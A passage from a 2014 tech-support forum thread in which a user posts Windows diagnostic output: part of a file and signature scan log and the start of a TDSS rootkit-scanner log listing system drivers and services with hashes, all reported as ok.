2014-10-15 13:56 - 2014-07-06 21:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:56 - 2014-07-06 21:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:56 - 2014-07-06 21:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:56 - 2014-07-06 21:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:56 - 2014-07-06 21:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:56 - 2014-06-27 20:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-01 09:16 - 2014-09-24 21:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-30 09:17 - 2012-05-01 10:33 - 00000000 ___RD () C:\Users\KELI\Dropbox
2014-10-30 09:17 - 2012-05-01 10:32 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Dropbox
2014-10-30 09:17 - 2011-03-21 11:19 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-30 09:17 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-30 09:16 - 2012-04-03 09:22 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-30 09:16 - 2010-10-16 12:07 - 01739619 _____ () C:\Windows\WindowsUpdate.log
2014-10-30 09:16 - 2009-07-14 00:39 - 00093463 _____ () C:\Windows\setupact.log
2014-10-30 09:15 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-30 09:15 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-30 08:42 - 2014-06-04 10:57 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
2014-10-30 08:42 - 2009-07-25 08:54 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-29 11:30 - 2011-03-21 11:19 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-29 09:17 - 2010-10-16 12:11 - 00000000 ____D () C:\ProgramData\PDFC
2014-10-28 13:16 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-28 10:00 - 2010-12-29 18:48 - 00073034 _____ () C:\Windows\PFRO.log
2014-10-28 09:57 - 2009-07-13 22:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-28 09:38 - 2012-08-29 09:07 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-27 16:37 - 2009-07-13 22:37 - 00000000 ___RD () C:\Users\Public
2014-10-27 15:49 - 2014-06-04 10:56 - 00000000 ____D () C:\Users\KELI\AppData\Local\Citrix
2014-10-27 09:28 - 2012-01-10 10:25 - 00000316 _____ () C:\Windows\Tasks\HPCeeScheduleForKELI.job
2014-10-16 11:53 - 2010-12-29 18:49 - 00000000 ____D () C:\Scans
2014-10-16 10:24 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 09:58 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 09:27 - 2012-01-17 10:31 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-10-16 09:27 - 2011-04-12 09:27 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2014-10-16 09:13 - 2009-07-14 00:33 - 00401032 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 09:12 - 2014-05-06 16:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 16:55 - 2013-08-14 17:10 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 16:52 - 2011-03-21 09:13 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 15:53 - 2011-03-21 11:46 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpogfvpt.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-27 18:50
 
==================== End Of Log ============================
 
 
*******....continued on next post


#6 ScotDesort

ScotDesort
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 30 October 2014 - 08:27 AM

....continued

 

TDSS LOG
 
09:21:27.0923 0x0d88  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
09:21:31.0667 0x0d88  ============================================================
09:21:31.0667 0x0d88  Current date / time: 2014/10/30 09:21:31.0667
09:21:31.0667 0x0d88  SystemInfo:
09:21:31.0667 0x0d88  
09:21:31.0667 0x0d88  OS Version: 6.1.7601 ServicePack: 1.0
09:21:31.0667 0x0d88  Product type: Workstation
09:21:31.0667 0x0d88  ComputerName: ATTY-2
09:21:31.0667 0x0d88  UserName: KELI
09:21:31.0667 0x0d88  Windows directory: C:\Windows
09:21:31.0667 0x0d88  System windows directory: C:\Windows
09:21:31.0667 0x0d88  Processor architecture: Intel x86
09:21:31.0667 0x0d88  Number of processors: 2
09:21:31.0667 0x0d88  Page size: 0x1000
09:21:31.0667 0x0d88  Boot type: Normal boot
09:21:31.0667 0x0d88  ============================================================
09:21:33.0103 0x0d88  KLMD registered as C:\Windows\system32\drivers\64460635.sys
09:21:33.0305 0x0d88  System UUID: {7720DF7E-60B5-D310-D451-A8568080E759}
09:21:33.0680 0x0d88  Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 ( 149.05 Gb ), SectorSize: 0x200, Cylinders: 0x4C01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
09:21:33.0680 0x0d88  ============================================================
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0:
09:21:33.0680 0x0d88  MBR partitions:
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x3FF800
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x400000, BlocksNum 0x1171B000
09:21:33.0680 0x0d88  \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x11B1B000, BlocksNum 0xEF9800
09:21:33.0680 0x0d88  ============================================================
09:21:33.0711 0x0d88  C: <-> \Device\Harddisk0\DR0\Partition2
09:21:33.0773 0x0d88  D: <-> \Device\Harddisk0\DR0\Partition3
09:21:33.0773 0x0d88  ============================================================
09:21:33.0773 0x0d88  Initialize success
09:21:33.0789 0x0d88  ============================================================
09:21:35.0583 0x0304  ============================================================
09:21:35.0583 0x0304  Scan started
09:21:35.0583 0x0304  Mode: Manual; 
09:21:35.0583 0x0304  ============================================================
09:21:35.0583 0x0304  KSN ping started
09:21:38.0349 0x0304  KSN ping finished: true
09:21:39.0229 0x0304  ================ Scan system memory ========================
09:21:39.0229 0x0304  System memory - ok
09:21:39.0229 0x0304  ================ Scan services =============================
09:21:39.0431 0x0304  [ 1B133875B8AA8AC48969BD3458AFE9F5, 01753BDD47F3F9BC0E0D23A069B9C56D4AE6A6B6295BC19B95AE245D25B12744 ] 1394ohci        C:\Windows\system32\drivers\1394ohci.sys
09:21:39.0435 0x0304  1394ohci - ok
09:21:39.0499 0x0304  [ CEA80C80BED809AA0DA6FEBC04733349, AE69C142DC2210A4AE657C23CEA4A6E7CB32C4F4EBA039414123CAC52157509B ] ACPI            C:\Windows\system32\drivers\ACPI.sys
09:21:39.0514 0x0304  ACPI - ok
09:21:39.0583 0x0304  [ 1EFBC664ABFF416D1D07DB115DCB264F, BF94D069D692140B792DBF4FD3CB0127D27C26CC5BFB6B0C28A8B6346767EE58 ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
09:21:39.0583 0x0304  AcpiPmi - ok
09:21:39.0683 0x0304  [ B362181ED3771DC03B4141927C80F801, 69514E5177A0AEA89C27C2234712F9F82E8D8F99E1FD4273898C9324C6FF7472 ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
09:21:39.0683 0x0304  AdobeARMservice - ok
09:21:39.0829 0x0304  [ 4ECFCAAE5CB380F58934F0DCF5F64E7F, D82B37E57D93484D7A3CB65470BCD54A578A695F0203A8DD441B1348C1EEA751 ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
09:21:39.0829 0x0304  AdobeFlashPlayerUpdateSvc - ok
09:21:39.0889 0x0304  [ 21E785EBD7DC90A06391141AAC7892FB, A2D3D764C5E6DC0AD5AAF48485FFB8B121D2A40DC08ECF2D2CB92278A1002B25 ] adp94xx         C:\Windows\system32\DRIVERS\adp94xx.sys
09:21:39.0896 0x0304  adp94xx - ok
09:21:39.0913 0x0304  [ 0C676BC278D5B59FF5ABD57BBE9123F2, 339E8A433D186BAAB6FCB44C82CC9FB6FCD63C87981449494CBEB2072CB6B7BB ] adpahci         C:\Windows\system32\DRIVERS\adpahci.sys
09:21:39.0917 0x0304  adpahci - ok
09:21:39.0935 0x0304  [ 7C7B5EE4B7B822EC85321FE23A27DB33, A934AFB71D439555E6376DA9B34F82E8D39A300A4547BE9AC9311F6A3C36270C ] adpu320         C:\Windows\system32\DRIVERS\adpu320.sys
09:21:39.0940 0x0304  adpu320 - ok
09:21:39.0968 0x0304  [ 8B5EEFEEC1E6D1A72A06C526628AD161, 026CDF4C96F4D493E7BABF79A14C4B0B5ADCCEF0B081FFFA2E3B243B2414167F ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
09:21:39.0969 0x0304  AeLookupSvc - ok
09:21:40.0021 0x0304  [ D0B388DA1D111A34366E04EB4A5DD156, 60D226F027F4025CC032CAFF73A80FAFB5FA75445654FDCF80CA8C0419C6E938 ] AFD             C:\Windows\system32\drivers\afd.sys
09:21:40.0026 0x0304  AFD - ok
09:21:40.0055 0x0304  [ 507812C3054C21CEF746B6EE3D04DD6E, D7E59350AC338AD229E3D10C76E32AE16D120311B263714A9CD94AB538633B0E ] agp440          C:\Windows\system32\drivers\agp440.sys
09:21:40.0056 0x0304  agp440 - ok
09:21:40.0091 0x0304  [ 8B30250D573A8F6B4BD23195160D8707, 64EC289AFCD63D84EAFD9D81C50D0A77BCC79A1EFF32C50B2776BB0C0151757D ] aic78xx         C:\Windows\system32\DRIVERS\djsvs.sys
09:21:40.0093 0x0304  aic78xx - ok
09:21:40.0138 0x0304  [ 18A54E132947CD98FEA9ACCC57F98F13, 9D39AF972785E49F0DD12C4BAEF39A79CD69F098886BF152AF1B7CCE2E902115 ] ALG             C:\Windows\System32\alg.exe
09:21:40.0140 0x0304  ALG - ok
09:21:40.0175 0x0304  [ 0D40BCF52EA90FC7DF2AEAB6503DEA44, 1D1AA8F50935D976C29DE7A84708CADBBBDD936F0DD2C059E820F0D21367B3B6 ] aliide          C:\Windows\system32\drivers\aliide.sys
09:21:40.0176 0x0304  aliide - ok
09:21:40.0189 0x0304  [ 3C6600A0696E90A463771C7422E23AB5, 370B33DC1C25B981628A318BAE434A78A5F0A0DA93C2896DC7A3D7B87AE1A5E7 ] amdagp          C:\Windows\system32\drivers\amdagp.sys
09:21:40.0190 0x0304  amdagp - ok
09:21:40.0216 0x0304  [ CD5914170297126B6266860198D1D4F0, 2239FCBD1A7EC27CE4F10DA36AE6BD6CCB87E5128C82CA71B84BFE5AF5602A60 ] amdide          C:\Windows\system32\drivers\amdide.sys
09:21:40.0216 0x0304  amdide - ok
09:21:40.0247 0x0304  [ 00DDA200D71BAC534BF56A9DB5DFD666, CA316B1FFD85BA1CF8664B3229DA1F238A5341E016059F7ED89702324CFD124B ] AmdK8           C:\Windows\system32\DRIVERS\amdk8.sys
09:21:40.0247 0x0304  AmdK8 - ok
09:21:40.0247 0x0304  [ 3CBF30F5370FDA40DD3E87DF38EA53B6, 7EACF1743367BE805357B6FD10F8F99E9B1C301FE3782D77719347B13DFA65EC ] AmdPPM          C:\Windows\system32\DRIVERS\amdppm.sys
09:21:40.0247 0x0304  AmdPPM - ok
09:21:40.0310 0x0304  [ D320BF87125326F996D4904FE24300FC, F767D8C5C58D57202905D829F7AE1B1FF33937F407FDCE4C90E32A6638F27416 ] amdsata         C:\Windows\system32\drivers\amdsata.sys
09:21:40.0310 0x0304  amdsata - ok
09:21:40.0310 0x0304  [ EA43AF0C423FF267355F74E7A53BDABA, 3F1335909AB0281A2FBDD7AD90E18309E091656CD32B48894B992789D8C61DB4 ] amdsbs          C:\Windows\system32\DRIVERS\amdsbs.sys
09:21:40.0325 0x0304  amdsbs - ok
09:21:40.0325 0x0304  [ 46387FB17B086D16DEA267D5BE23A2F2, 8B8AC61B91F154B4EB5CC6DECB5FCCEBA8B42EFE94859947136AD06681EA8ED0 ] amdxata         C:\Windows\system32\drivers\amdxata.sys
09:21:40.0325 0x0304  amdxata - ok
09:21:40.0376 0x0304  [ E499E422412EF37576092A52648DB2B4, 95E9C11258CAF37060242BA4E1170CEDECF3376CF0A9A1E61D46706D7C7F36F8 ] AppID           C:\Windows\system32\drivers\appid.sys
09:21:40.0377 0x0304  AppID - ok
09:21:40.0383 0x0304  [ 89B6FA43B68A373B304DFB8F6776B255, 36ABD9AB89CBC7991DE9B04051B26014982953697862BC46EF8AE4ACC2404128 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
09:21:40.0383 0x0304  AppIDSvc - ok
09:21:40.0446 0x0304  [ EACFDF31921F51C097629F1F3C9129B4, 24138755D823E69760579ECBD672421192457CDC9941B2BC499C2D34D83E86C3 ] Appinfo         C:\Windows\System32\appinfo.dll
09:21:40.0446 0x0304  Appinfo - ok
09:21:40.0478 0x0304  [ A45D184DF6A8803DA13A0B329517A64A, C1D16B60A6D69689AE951DC3D6884ED2E233D144B3FC0B86BC1C50AAAAA01ED2 ] AppMgmt         C:\Windows\System32\appmgmts.dll
09:21:40.0481 0x0304  AppMgmt - ok
09:21:40.0498 0x0304  [ 2932004F49677BD84DBC72EDB754FFB3, 73F84582244AC53994A2F4499A119B4A84A6BF7FD3046C29A8080C763DE540B8 ] arc             C:\Windows\system32\DRIVERS\arc.sys
09:21:40.0498 0x0304  arc - ok
09:21:40.0514 0x0304  [ 5D6F36C46FD283AE1B57BD2E9FEB0BC7, F7C9C3B4F2C816F57A43B2921672858C291054220BADE291044343778216F6BA ] arcsas          C:\Windows\system32\DRIVERS\arcsas.sys
09:21:40.0514 0x0304  arcsas - ok
09:21:40.0630 0x0304  [ 9D768C43FEF254DD50B1DBF8AD5C4C0B, A50854EA5C08605133B8BB4DFDC6090357C5665314AA72E0BFA1E07D4E451F09 ] aspnet_state    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
09:21:40.0630 0x0304  aspnet_state - ok
09:21:40.0661 0x0304  [ ADD2ADE1C2B285AB8378D2DAAF991481, 7965A705F37924C0EC7A934E64E89C5DF4069816E2EEA3509E0AC90F78910519 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
09:21:40.0661 0x0304  AsyncMac - ok
09:21:40.0714 0x0304  [ 338C86357871C167A96AB976519BF59E, F28CC534523D1701B0552F5D7E18E88369C4218BDB1F69110C3E31D395884AD6 ] atapi           C:\Windows\system32\drivers\atapi.sys
09:21:40.0714 0x0304  atapi - ok
09:21:40.0798 0x0304  [ 9A34927D722AD16841263636A4BF069B, 4A92A84E3E4A8BA9551CFB765D0E6FE50E7CBD5695568FB3A37E1556770A369F ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
09:21:40.0798 0x0304  AudioEndpointBuilder - ok
09:21:40.0814 0x0304  [ 9A34927D722AD16841263636A4BF069B, 4A92A84E3E4A8BA9551CFB765D0E6FE50E7CBD5695568FB3A37E1556770A369F ] Audiosrv        C:\Windows\System32\Audiosrv.dll
09:21:40.0829 0x0304  Audiosrv - ok
09:21:40.0861 0x0304  [ 6E30D02AAC9CAC84F421622E3A2F6178, 229DC527C1D6C778BCA2C855A2A6F6D2C4B0F4F6DE56C886B3AAD26E3347952C ] AxInstSV        C:\Windows\System32\AxInstSV.dll
09:21:40.0861 0x0304  AxInstSV - ok
09:21:40.0899 0x0304  [ 1A231ABEC60FD316EC54C66715543CEC, 09E2897BA80737997A286EA5408C03DD3CC0EBACD24CB391C2455B6D4BE7D67E ] b06bdrv         C:\Windows\system32\DRIVERS\bxvbdx.sys
09:21:40.0914 0x0304  b06bdrv - ok
09:21:40.0930 0x0304  [ BD8869EB9CDE6BBE4508D869929869EE, F4363A12EBFDBB89C69FD59B22F9EE05BADA07D477A1DF2DE01F59D6EE496543 ] b57nd60x        C:\Windows\system32\DRIVERS\b57nd60x.sys
09:21:40.0930 0x0304  b57nd60x - ok
09:21:40.0983 0x0304  [ EE1E9C3BB8228AE423DD38DB69128E71, ED54FD9795F3A4D32F02BED6052AD9404409A05644CDBEBFF19C662D104DA95A ] BDESVC          C:\Windows\System32\bdesvc.dll
09:21:40.0983 0x0304  BDESVC - ok
09:21:40.0998 0x0304  [ 505506526A9D467307B3C393DEDAF858, 8AD6F1492E357F57CF42261497BA29122045D4FC0DCC9669AA5AC9B2A4BABFA4 ] Beep            C:\Windows\system32\drivers\Beep.sys
09:21:40.0998 0x0304  Beep - ok
09:21:41.0061 0x0304  [ 1E2BAC209D184BB851E1A187D8A29136, 53933C938DA5126986FFF2918C1F522ABE93ABAB460AE32E4453161C2F7B68DF ] BFE             C:\Windows\System32\bfe.dll
09:21:41.0061 0x0304  BFE - ok
09:21:41.0115 0x0304  [ E585445D5021971FAE10393F0F1C3961, 178C008A9A0A6BFDA65EB0B98C510271360AD4474F22F13594F5EB60AA4E1CF5 ] BITS            C:\Windows\system32\qmgr.dll
09:21:41.0130 0x0304  BITS - ok
09:21:41.0146 0x0304  [ 2287078ED48FCFC477B05B20CF38F36F, 55BCA6174E6034A8D61CBE4126B2F1989F6052BFA624BEA9C0A0A664AEC74521 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
09:21:41.0146 0x0304  blbdrive - ok
09:21:41.0183 0x0304  [ 8F2DA3028D5FCBD1A060A3DE64CD6506, E234672E9CFE1A95AD2E78E306E41E010B870221E6EBBC0E2B0BE2FA5CE0CD76 ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
09:21:41.0183 0x0304  bowser - ok
09:21:41.0199 0x0304  [ 9F9ACC7F7CCDE8A15C282D3F88B43309, A9131334BD9CF8FD60BA9D54AA054E2DF2BE1219FB650DF1464F2787BDEAE98F ] BrFiltLo        C:\Windows\system32\DRIVERS\BrFiltLo.sys
09:21:41.0199 0x0304  BrFiltLo - ok
09:21:41.0199 0x0304  [ 56801AD62213A41F6497F96DEE83755A, 0DEB8318FB47DF6473C171C795C735E26A73FA12232876C6856549EA16F33361 ] BrFiltUp        C:\Windows\system32\DRIVERS\BrFiltUp.sys
09:21:41.0199 0x0304  BrFiltUp - ok
09:21:41.0230 0x0304  [ 77361D72A04F18809D0EFB6CCEB74D4B, 55E7DB65BB29FF421F138CDFF05E5ECFFC7C8862FAA68F6179A3BA9D6B69AE64 ] BridgeMP        C:\Windows\system32\DRIVERS\bridge.sys
09:21:41.0230 0x0304  BridgeMP - ok
09:21:41.0284 0x0304  [ 3DAA727B5B0A45039B0E1C9A211B8400, 903B51E75F0C503A0E255120F53BF51B047B219FEC1E15F2F1D02DDD562FC73B ] Browser         C:\Windows\System32\browser.dll
09:21:41.0284 0x0304  Browser - ok
09:21:41.0315 0x0304  [ 845B8CE732E67F3B4133164868C666EA, 9309B094CD9B5EBC46295A5EB806BED472C3CEDE3B5F6F497EBDABA496A2A27F ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
09:21:41.0315 0x0304  Brserid - ok
09:21:41.0330 0x0304  [ 203F0B1E73ADADBBB7B7B1FABD901F6B, 782FA7B26940FE479C49C9BAA2EB582CDAAAD607013E9BCFC85E6FBBB7D49A6D ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
09:21:41.0330 0x0304  BrSerWdm - ok
09:21:41.0346 0x0304  [ BD456606156BA17E60A04E18016AE54B, DFBDC9DA6A3EA40BACFF204BC6C55C2C122B5885D2CBF6D45054DE43EE15EC4D ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
09:21:41.0346 0x0304  BrUsbMdm - ok
09:21:41.0362 0x0304  [ AF72ED54503F717A43268B3CC5FAEC2E, 4A638669B0C30B1BDED242A8BF2015A37749570FF4D67D190BACC8D7E0C44468 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
09:21:41.0362 0x0304  BrUsbSer - ok
09:21:41.0380 0x0304  [ ED3DF7C56CE0084EB2034432FC56565A, B5B75E002E7BC0209582C635CCCA26DB569BDB23C33A126634E00C6434BF941B ] BTHMODEM        C:\Windows\system32\DRIVERS\bthmodem.sys
09:21:41.0381 0x0304  BTHMODEM - ok
09:21:41.0412 0x0304  [ 1DF19C96EEF6C29D1C3E1A8678E07190, 1F4BB161FF3A1C5B1465BB52F3520FEDB7ACB1FAA132466F07D16DB8E394AEA5 ] bthserv         C:\Windows\system32\bthserv.dll
09:21:41.0412 0x0304  bthserv - ok
09:21:41.0459 0x0304  catchme - ok
09:21:41.0498 0x0304  [ 77EA11B065E0A8AB902D78145CA51E10, 160EB3BBE9E5F3CC4A02584E6F2576A812C7565B940D74838B983F1EE51FA73A ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
09:21:41.0498 0x0304  cdfs - ok
09:21:41.0545 0x0304  [ BE167ED0FDB9C1FA1133953C18D5A6C9, E26A851CA13E7300F977E5B20FA5D25FD0E1442AB6AD5DB58BBDB2DAAD87027C ] cdrom           C:\Windows\system32\drivers\cdrom.sys
09:21:41.0545 0x0304  cdrom - ok
09:21:41.0583 0x0304  [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] CertPropSvc     C:\Windows\System32\certprop.dll
09:21:41.0599 0x0304  CertPropSvc - ok
09:21:41.0615 0x0304  [ 3FE3FE94A34DF6FB06E6418D0F6A0060, 6B3A2A26609A75B690D4C0B3059E40822F3B3DB08943F58EC496BABDA7D0A735 ] circlass        C:\Windows\system32\DRIVERS\circlass.sys
09:21:41.0615 0x0304  circlass - ok
09:21:41.0630 0x0304  [ 635181E0E9BBF16871BF5380D71DB02D, 58D5150C6F3B9F1730FFDF3A8A2ABF5FF207F9785BD66C0C1E03A0F1C223A26A ] CLFS            C:\Windows\system32\CLFS.sys
09:21:41.0630 0x0304  CLFS - ok
09:21:41.0701 0x0304  [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
09:21:41.0701 0x0304  clr_optimization_v2.0.50727_32 - ok
09:21:41.0784 0x0304  [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
09:21:41.0914 0x0304  clr_optimization_v4.0.30319_32 - ok
09:21:41.0929 0x0304  [ DEA805815E587DAD1DD2C502220B5616, 2D6A7668C95352B818F5EC59FF462894935833D34190257DA9CAC7E67FD3631C ] CmBatt          C:\Windows\system32\DRIVERS\CmBatt.sys
09:21:41.0929 0x0304  CmBatt - ok
09:21:41.0983 0x0304  [ C537B1DB64D495B9B4717B4D6D9EDBF2, 400EEFE662DE117C9CC956E4CBD5E98F28F962E7447CD93E8A78FDD8CA39EB4B ] cmdide          C:\Windows\system32\drivers\cmdide.sys
09:21:41.0999 0x0304  cmdide - ok
09:21:42.0030 0x0304  [ 85449EEBE8F8EBD6481EFBF0F352B4EB, E6FF04970C5A5BFDE7297A86C1C7B9BFE2E0F976A1A1AFB874CEB488DC6151CC ] CNG             C:\Windows\system32\Drivers\cng.sys
09:21:42.0046 0x0304  CNG - ok
09:21:42.0046 0x0304  [ A6023D3823C37043986713F118A89BEE, FAC239A7FA6251C7EDFFA34B4BAE3910B8BC0BD4A3574B6DB6931A8D691E207B ] Compbatt        C:\Windows\system32\DRIVERS\compbatt.sys
09:21:42.0046 0x0304  Compbatt - ok
09:21:42.0085 0x0304  [ CBE8C58A8579CFE5FCCF809E6F114E89, AC083A1C649EBA18C59FCC1772D0784B10E2B8C63094E3C14388E147DBC3F6DF ] CompositeBus    C:\Windows\system32\drivers\CompositeBus.sys
09:21:42.0085 0x0304  CompositeBus - ok
09:21:42.0085 0x0304  COMSysApp - ok
09:21:42.0100 0x0304  [ 2C4EBCFC84A9B44F209DFF6C6E6C61D1, 6FC323217D82EF661BA0E3F949B61B05BB5235D1A69C81D24876C2153FAECEF6 ] crcdisk         C:\Windows\system32\DRIVERS\crcdisk.sys
09:21:42.0100 0x0304  crcdisk - ok
09:21:42.0147 0x0304  [ 623E143F2DF17C0106A9988F5D7DC878, 9DA30262FF22FA9F1DB247CB3B4A2892D79730EF0ECC9589D399D24B4F58E565 ] CryptSvc        C:\Windows\system32\cryptsvc.dll
09:21:42.0147 0x0304  CryptSvc - ok
09:21:42.0198 0x0304  [ 3C2177A897B4CA2788C6FB0C3FD81D4B, 98575CBD0664586E6211D02E71BDD52CBAA149A1658573550E29E74E5F7B1553 ] CSC             C:\Windows\system32\drivers\csc.sys
09:21:42.0198 0x0304  CSC - ok
09:21:42.0245 0x0304  [ 15F93B37F6801943360D9EB42485D5D3, DD6838C6496CB15F8BB57A6596F6A64ADD9C36B09F062295699131232712B558 ] CscService      C:\Windows\System32\cscsvc.dll
09:21:42.0261 0x0304  CscService - ok
09:21:42.0284 0x0304  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] DcomLaunch      C:\Windows\system32\rpcss.dll
09:21:42.0284 0x0304  DcomLaunch - ok
